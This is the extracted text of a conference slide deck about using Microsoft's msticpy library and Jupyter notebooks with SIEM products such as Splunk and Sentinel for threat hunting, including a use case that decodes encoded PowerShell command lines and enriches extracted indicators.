Practical msticpy use ~ rainbow bridge to SIEM for advanced threat hunting ~

357 Views

September 08, 23

スライド概要

[EN]長谷川_DFIR_APAC_SUMMIT_2023
https://www.sans.org/cyber-security-training-events/apac-dfir-summit-2023/

profile-image

Security Engineer & Researcher https://www.hacket-engine.com

シェア

またはPlayer版

埋め込む »CMSなどでJSが使えない場合

関連スライド

各ページのテキスト
2.

$WHOAMI • Threat Hunter/App Developer/Threat Researcher • OSS Contributor • msticpy,unprotect,atomic-red-team,cuckoo,capev2.. CSIRT Incident Handler Forensic • Qualifications • 7 GIACs • CISSP、CISA • SNS • HN: hackeT • X: @T_8ase Full-stack Engineer Fighting injustice attack world ! Service Dev/Opera:on SOC Analyst MSSP Threat Researcher/binarian AI Anti-Virus 2

3.

$more GoAhead Inc. CEO: Mitsuhiro Nakamura Splunk.conf 2017@USA Splunk Champion Free Splunk App/Add-ons by GoAhead https://splunkbase.splunk.com/apps?keyword=goahead Established in 2017 Data Analysis Company Splunk is our strength for Security Challenges KOBANZAME (IP Whois DB) Heuristic Logic Data Visualization Aim for maximum effectiveness with minimum resources 3

4.

Agenda • Invariable Operation with SIEM • msticpy 101 Overview and Basics • msticpy 201 Jupyter Notebook and ( pros | cons ) • msticpy 301 Practical use case • Take Away 4

5.

Invariable Operation with SIEM 5

6.

Background and Issues Old fashioned Nowadays Never ending Dev & Ope tasks l Modification and addition of analytical logic to keep up with new threats l Thresholds tailored to the internal situation as well as the threat situation in the world Analysis︓Human-wave tactics for raw log Monitoring︓Alert by Email Analysis︓ Multi-axis search of formatted logs Monitoring︓Visualized Dashboard, Alert from SIEM Documen tations Modify Thresh olds Bugs Update Add Panels SIEM func:ons and exis:ng dashboards Biases some:mes lead to non-free analysis 6

7.

Objective Advanced Threat Hunting Threat Hunting • Proactive detection and response to signs of malicious activity or threats • Investigate using threat intelligence, unapplied IOCs, anomaly detection • Iterations between hypothesis and verification Advanced Threat Hunting • Identifying undetected threats from raw data • check raw data too and look for omissions in processing and detection by security product. • Inherently data analysis with freedom (ad hoc) • • • • uniquely conceived analytical logic unrestricted external collaboration, eccentric visualization emphasis that is easy for readers to understand • Continuous update operation • Machine Learning & Deep Learning (ML/DL) • Automation 7

8.

Security Information and Event Management First Genera+on Gartner 2005 Log and Event management integration Second Genera+on Correlation analysis with CTI Big data processing Third Generation Gartner 2017 UEBA, SOAR addition • SIEM Products • Splunk/MS Sentinel/IBM Qradar/ Exabeam/Sumo Logic/Elastic, etc. • SIEM by Security venders • Can collect/extract/search/analyze/ visualize/detect/respond • Have the individual threat hunting function • Have ML/DL extensions source: Gartner Inc, 2022 Magic Quadrant 8

9.

SIEM’s advantage • Rapid search by indexing and field normalization (CIM, ASIM) • Statistical calculations are easy with the benefit of its search language • Can store threat intelligence • Multiple analyst can see the same data and analysis results • SIEM vendors also provide a lot of detection logic 9

10.

SIEM's breakdown • Rapid search by indexing and field normalization (CIM, ASIM) • If extraction fails, it is missing from the search at the beginning or from the analysis along the way. • Statistical calculations are easy with the benefit of its search language • Existing some process which is not good at, and take costs for learning search language • Can store threat intelligence • Most of the intelligence is self-prepared and operational by ourselves. • Multiple analyst can see the same data and analysis results • Various limitations due to shared resources • SIEM vendors also provide a lot of detection logic • Necessary and sufficient ? No! 10

11.

Not recommend to rely too much on SIEM analysis! • When a failure occurs, not everyone can be analyzed until recovery. • Over-reliance on analysis in SIEM search language only, forgetting how to analyze raw data • Who will ensure the integrity of the data and search results in SIEM ? • Limitations of SIEM • Default upper limits for sub search and multi value (truncate) • Default upper limit for number of plots on graph (truncate) • Difficult to notice search omissions due to misconfiguration • Don't rely solely on the logic provided by SIEM vender • Enterprise SIEMs Miss 76 Percent of MITRE ATT&CK Techniques • source: CardinalOps, ”2023 Report on State of SIEM Detection Risk” 11

12.

For Advanced Threat Hunting msticpy Automation Infinite Visualiza:on Machine Learning Data Validation Consistent I/O Time Series Analysis SIEM 12

13.

msticpy 101 Overview and Basics 13

14.

Microsoft Threat Intelligence Center (MSTIC) on Python and Jupyter Notebooks msticpy • MSTICpy: OSS library developed by Microsoft's MSTIC • Written in Python, usually used on Jupyter Notebooks • Extensive functionality for infringement investigation and threat hunting • March 2019 ~ 200k+ Downloads https://github.com/microsoft/msticpy • Presented at BlackHat USA 2020 • Frequent update recently and continues to evolve • Still few users and blog article in Asia and Japan • Fall into the following four process broadly • Only desired functions can be used piecemeal because of library-based Data Acquisition Data Processing Analysis including ML Visualization 14

15.

msticpy’s Documentation & Resource • MSTICpy ☞ msticpy in this presentation • Official document • • • • • https://msticpy.readthedocs.io Word count 100k+ RST files 80+ Jupyter Notebook samples 40+ Past training resources • msticpy-lab, msticpy-training github repo • Official Blog • https://msticpy.medium.com Time-consuming for learning with the huge resources ... 15

16.

msticpy Capabilities Acquisition Querying Logs Visualization Data Visualization Analysis Utility Analysis Pivot Data Enrichment Security Analysis Enrichment Analysis ms@cpyconfig.yaml h"ps://twi"er.com/fr0gger_/status/1623209441146593281?s=61&t=v8tLnMcFFdnsiT38CeGBcg 16

17.

msticpy Data Flow Diagram Internet Enrichment SIEM raw p Threat Intel Lookup p Whois, GeoIP Acquisi:on upload Local Analysis DataLake (SIEM) rich Local p Decode p Extract p ML Visualization Jupyter Notebook 17

18.

msticpy: Data Acquisition (1) • Create instance of Query Provider • Select from data sources (left picture) LocalData: connect to .pkl files in ./data dir Splunk: connect to Splunk REST port with msticpyconfig.yaml Communication channel is NOT independently encrypted by msticpy’s uniq func => HTTPS (SSL) is necessary 18

19.

msticpy: Data Acquisition (2) • Return: Pandas DataFrame • Ad hoc query function • exec_query(): arbitrary query • Built-in query function • select from the list varies by data source 19

20.

msticpy: Enrichment • Threat Intel Lookup • Pivot TI function (Only on Jupyter Notebook) • TILookup class (Available on also python program) • GeoIP (MaxMind GeoLite2, IPStack) • IPWhois (Cymru, RADB, RDAP) 20

21.

msticpy: Analysis (Utility) • Base64 Decode • IoC Extract 21

22.

msticpy: Analysis (Pivot) • Pivot Functions being loaded by "init_notebook()" is required basically • Wrap msticpy functions and classes for ease of discovery and use • Standardization of function parameters, syntax, and output format • “.mp_pivot.” can be piped in multiple stages 22

23.

msticpy: Analysis (Security) • Event Clustering • Classification of “process and logon events” on the host machine • Time Series Analysis • Anomaly detection in time series data considering seasonal variations • Outlier Identification • Outlier detection using decision trees • Anomalous Session • Unusual pattern detection of rare event sequences with low likelihood • Use of the event’s command name, its parameter names and values 23

24.

msticpy: Visualization • Implemented with BokehJS • Viz charts implemented in msticpy • Timeline,ProcessTree,Folium Map,Matrix Plot, Entity/Network Graph ,etc. • Can create additional charts with MorphCharts 24

25.

msticpy 201 Jupyter Notebook and ( pros | cons ) 25

26.

Benefits of Analyzing with Jupyter Notebook • Reproducibility of data, it can output of intermediate results • Easy combination/integration with external sources • Easy use of ML/DL frameworks • Extensive visualization library at your disposal • Gain applied skills as a data scientist 26

27.

Ideal Relationship between Jupyter Notebook and SIEM Advanced Threat Hunting msticpy Intelligence Knowledge Deep Analysis on denoised data SIEM Rough noise reduction 27

28.

msticpy’s pros: Seasonal-Trend decomposition using LOESS Book: Covered in also “Machine Learning for Security Engineers Chapter 6 Anomaly Detection” 28

29.

msticpy’s pros: Consistent I/O • Sending by Data Uploader function (Transfer) • Only Azure Sentinel and Splunk are supported as of Aug 2023 • Can upload Data Frame, File, Folder msticpy Enriching SIEM ! Visualization charts cannot be transferred. However, similar Viz can be drawn in SIEM from the transferred results. OSINT (Internet) SIEM 29

30.

Jupyter & msticpy’s pros: Data Validation • Check the DataFrame result sequentially • Save for accidental overwriting by copy() func • Value type conversion and strip null values • Easy to validate char codes • GUI for time ranges ☞ • Pre-confirming actual Queries via Query Provider by “print” option Query to be searched 30

31.

Jupyter’s pros: Use of much ML/DL • Only a few ML models have built-in msticpy • • • • Event Clustering ☞ DBSCAN in scikit-learn Time Series Analysis and Anomaries ☞ STL in statsmodels Outlier Identification ☞ IsolationForest in scikit-learn less parameter tuning is required since they are specialized for commonly used threat hunting applications • Flexibility to use Python's rich ML/DL library NLP ML DL 31

32.

Jupyter’s pros: Infinite Visualization Maximum number of data plots (by default) Splunk MS Sentinel Jupyter 10,000 10,000 This Data was truncated in Splunk ! ♾ (Infinity) 32

33.

[FYI] Change the upper limit in the dashboard options • We can change the limit with the dashboard option "charting.data.count” in Splunk, but... 33

34.

Jupyter’s pros: Automation with papermill • Python library • Batch execution of Notebook files with different parameters • Introduced in the "Put it into Operation" section at the end of msticpy's training materials CUI Parameters are overwritten in the output notebook☟ Python 34

35.

Jupyter’s cons: Security Concerns about Data Transfer • Possibility to transfer sensitive data in SIEM to external Jupyter • Handling it with SIEM’s ACL may be the only way. • Eavesdropping/MITM Attack during data transfer to the Jupyter • SSL security dependencies on the SIEM side • More complicated security design msticpy (Jupyter) ! SIEM • Transferring Threat Intelligence data to SIEM is relatively clear. 35

36.

msticpy 301 Practical use case 36

37.

Toward Practical msticpy Use • Push direction is fine • Intelligence collected from external sources, analyzed and processed, and transferred to SIEM • Pull direction has the security concern of data transferring. • Planning a new security design from scratch for msticpy alone is a hurdle. • SIEM vender’s advanced analytical tricks with Jupyter • MS Sentinel ☞「Microsoft Azure Machine Learning Workspace」 • Completed within Azure • Splunk ☟ 「Splunk App for Data Science and Deep Learning (DSDL)」 • Preparing machine resources such as Docker containers externally • Data exchange between containers and Splunk • Installing msticpy in container side + Store the credential strings in “Azure Key Vault” and load them from there msticpy Splunk DSDL 37

38.

$more Splunk App for DSDL ! ! • single-instance | side-by-side • Implemented data security features • Use of proprietary SSL certificates • Custom password settings for Jupyter • Fine-grained ACL design with Splunk access tokens • Splunk MLTK commands can interact with containers • | fit ( Training to create a model ) • | apply ( Apply the trained model to the data for identification ) 38

39.

Use Case: Powershell process command line(1) | fit Search in Splunk powershell -enc Decode base64 Required the first time for model creation Delete null byte (¥x00) Extract IoC Enrichment IoC Return to Splunk | apply Originally, this mechanism is prepared for ML/DL algorithms, so I developed a custom model incorpora@ng ms@cpy. By executing the fit command, one .py file is created in app/model directory, the file is consisting of export functions from .ipynb h]ps://github.com/Tatsuya-hasegawa/MSTICPy_u:ls/blob/main/splunk_dsdl/ms:cpy_powershell_ioc.ipynb 39

40.

Use Case: Powershell process command line(2) fit ※Example of Splunk botsv2 dataset apply msticpy results 40

41.

Take Away • • • • • Not recommend to rely too much on SIEM analysis! msticpy's missionary work: happy to see more APAC users Let’s analyze and code on Jupyter Notebook to hone your skills! Let’s get on existing mechanisms for data security concerns! Let’s become a contributor of your favorite OSS. Happy msticpying! 41

42.

Quotations & References • msticpy docs https://msticpy.readthedocs.io/en/latest/ • msticpy-training https://github.com/microsoft/msticpy-training • msticpy-lab https://github.com/microsoft/msticpy-lab • Splunk DSDL docs https://docs.splunk.com/Documentation/DSDL/5.1.0/User/IntroDSDL • Splunk botsv2 dataset https://github.com/splunk/botsv2 • Microsoft Sentinel Notebook and msticpy https://learn.microsoft.com/en-us/azure/sentinel/notebook-get-started • papermill docs https://papermill.readthedocs.io/en/latest/ • macnica SIEM introduction by exabeam https://www.macnica.co.jp/business/security/manufacturers/exabeam/feature_07.html • My Qiita blog about msticpy https://qiita.com/hackeT • Machine Learning for Security Engineers https://www.oreilly.co.jp/books/9784873119076/ • awesome detection engineering https://github.com/infosecB/awesome-detection-engineering • CardinalOps’s 2023 report https://cardinalops.com/whitepapers/2023-report-on-state-of-siem-detection-risk/ 42

43.

Thank you ! 43